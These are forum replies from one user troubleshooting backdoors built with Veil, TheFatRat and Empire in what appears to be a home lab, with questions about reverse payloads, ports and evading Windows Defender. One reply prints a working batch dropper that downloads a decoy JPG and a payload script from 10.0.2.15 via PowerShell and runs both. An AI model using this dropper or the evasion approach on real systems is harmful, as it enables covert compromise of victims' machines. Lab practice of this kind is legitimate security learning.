Forum Replies Created
- AuthorPosts
- KayohParticipant
Sorry, meant it’s disabled in the virtual machine, although when disabled it still detects and automatically deletes some backdoors.
I’ll try using different ports and payloads.
Currently tried reverse_http, reverse_https and reverse_tcp, although I tried on both ports 4444 and 8080. I will keep trying to change the port.
Failing that I’ll see if I can create a backdoor using Veil and then change the code with hashcat to see if it works.
From my settings I’m not doing anything wrong though?
KayohParticipant
Windows Defender is disabled in the Windows host machine. Sometimes it will still detect the backdoor if I used Veil; Fatrat is fine, doesn’t get detected.
Images uploaded here: https://imgur.com/a/MwJNT5G
KayohParticipant
Yea, it’s strange, tried with other direct links to images, they didn’t load either.
I’ll host it on the apache2 server and see what happens. The Windows machine does have Internet access.
KayohParticipant
I’ll give it a try, awesome, thanks
KayohParticipant
I’m compressing this and here is the output shown to the Windows machine:
KayohParticipant
In my file it doesn’t have all those symbols after the .jpg, not sure where they came from when I copied and pasted.
Every time I type the .jpg link it seems to keep putting those symbols after :S which aren’t in the .bat file :S
This is an image of my file, it doesn’t have the weird symbols after the .jpg:
KayohParticipant
When extracting the file it shows a folder as _gpj for some reason. The file itself does show as a .jpg once it’s all extracted though, so that does help, thanks.
KayohParticipant
The image is: https://images-cdn.9gag.com/photo/ag5pMyg_460s.jpg
My file is:
@echo off
set files='https://images-cdn.9gag.com/photo/ag5pMyg_460s.jpg','http://10.0.2.15/evil-files/8080httpempire.bat'
powershell "(%files%)|foreach{$fileName='%TEMP%'+(Split-Path -Path $_ -Leaf);(new-object System.Net.WebClient).DownloadFile($_,$fileName);Invoke-Item $fileName;}"
KayohParticipant
Thanks a lot for the help, I will keep trying and testing, see if I can figure it out.
KayohParticipant
The connection works when Windows Defender is disabled. Windows Defender doesn’t block it or notice it’s a malicious file, why would it block the outgoing connection?
Would I have to rely on Veil, Empire or TheFatRat to create something that would give me a connection if Windows Defender is enabled?
KayohParticipant
Hi Diego,
Uploaded all of the pictures you’ve requested to imgur. If you click the image below it should show all pictures.
Hope this helps.
I don’t get any messages from Windows Defender when running the .bat file so I don’t think it blocks it.